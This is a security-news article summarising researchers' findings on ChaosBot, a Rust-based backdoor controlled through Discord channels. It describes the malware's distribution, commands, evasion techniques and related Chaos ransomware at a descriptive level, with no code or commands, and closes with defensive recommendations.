A new and sophisticated malware strain, dubbed ChaosBot, has been identified by cybersecurity researchers. This Rust-based backdoor utilizes Discord channels for command and control (C2), allowing attackers to remotely manage compromised computers. The malware's emergence highlights the evolving tactics of cybercriminals and the need for advanced defense strategies.

Key Takeaways

• Discord as a C2: ChaosBot leverages Discord for command and control, a novel approach for malware operations.

• Rust Programming Language: Written in Rust, the malware is designed for stealth and efficiency.

• Evasion Techniques: Employs advanced methods to bypass security measures like ETW and virtual machine detection.

• Broader Chaos Family: Appears to be part of a larger, evolving threat landscape, with related ransomware variants exhibiting destructive capabilities.

Initial Access and Distribution

Researchers first detected ChaosBot in late September 2025 within a financial services organization. The initial compromise was achieved through stolen credentials for a Cisco VPN and an over-privileged Active Directory account named 'serviceaccount.' Attackers then used Windows Management Instrumentation (WMI) to deploy the malware across the network.

Alternatively, ChaosBot has been distributed via phishing messages containing a malicious Windows shortcut (.LNK) file. When opened, this file executes a PowerShell command to download and run the malware, while simultaneously displaying a decoy PDF document to distract the user.

Command and Control via Discord

ChaosBot derives its name from the Discord profile of its operator, who uses the online moniker "chaos_00019." This individual, along with another user, "lovebb0024," manages the Discord channels used for C2 operations. Infected machines connect to these channels to receive instructions.

The malware supports several commands, including:

• shell: Execute shell commands via PowerShell.

• scr: Capture and upload screenshots.

• download: Download files to the victim's device.

• upload: Upload a file from the victim's device to the Discord channel.

Advanced Evasion and Persistence

To avoid detection, ChaosBot employs several sophisticated techniques:

• DLL Sideloading: It uses a legitimate Microsoft Edge binary, identity_helper.exe, to load its malicious payload (msedge_elf.dll), making it harder to distinguish from normal system processes.

• Reverse Proxy: The malware establishes a fast reverse proxy (FRP) to maintain persistent access to the compromised network. It has also been observed attempting to use Visual Studio Code Tunnel services for similar purposes.

• Anti-Virtual Machine: ChaosBot checks for common Virtual Machine MAC address prefixes (VMware, VirtualBox) and terminates its execution if a virtualized environment is detected, a tactic to thwart analysis.

• ETW Patching: It patches Event Tracing for Windows (ETW) functions to disable monitoring by endpoint detection and response (EDR) tools.

The Broader Chaos Threat

ChaosBot is linked to a larger family of malware, including a C++ variant of Chaos ransomware. This ransomware has evolved to include destructive capabilities, such as irrevocably deleting large files instead of encrypting them. It also features clipboard hijacking to redirect cryptocurrency transactions to attacker-controlled wallets.

These evolving threats necessitate a shift in defense strategies, moving beyond signature-based detection to prioritize behavioral monitoring, robust credential management, and proactive threat hunting.

Sources

• New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs, The Hacker News.

• New Rust-Based Malware “ChaosBot” Uses Discord Channels to Hijack PCs, TechJuice.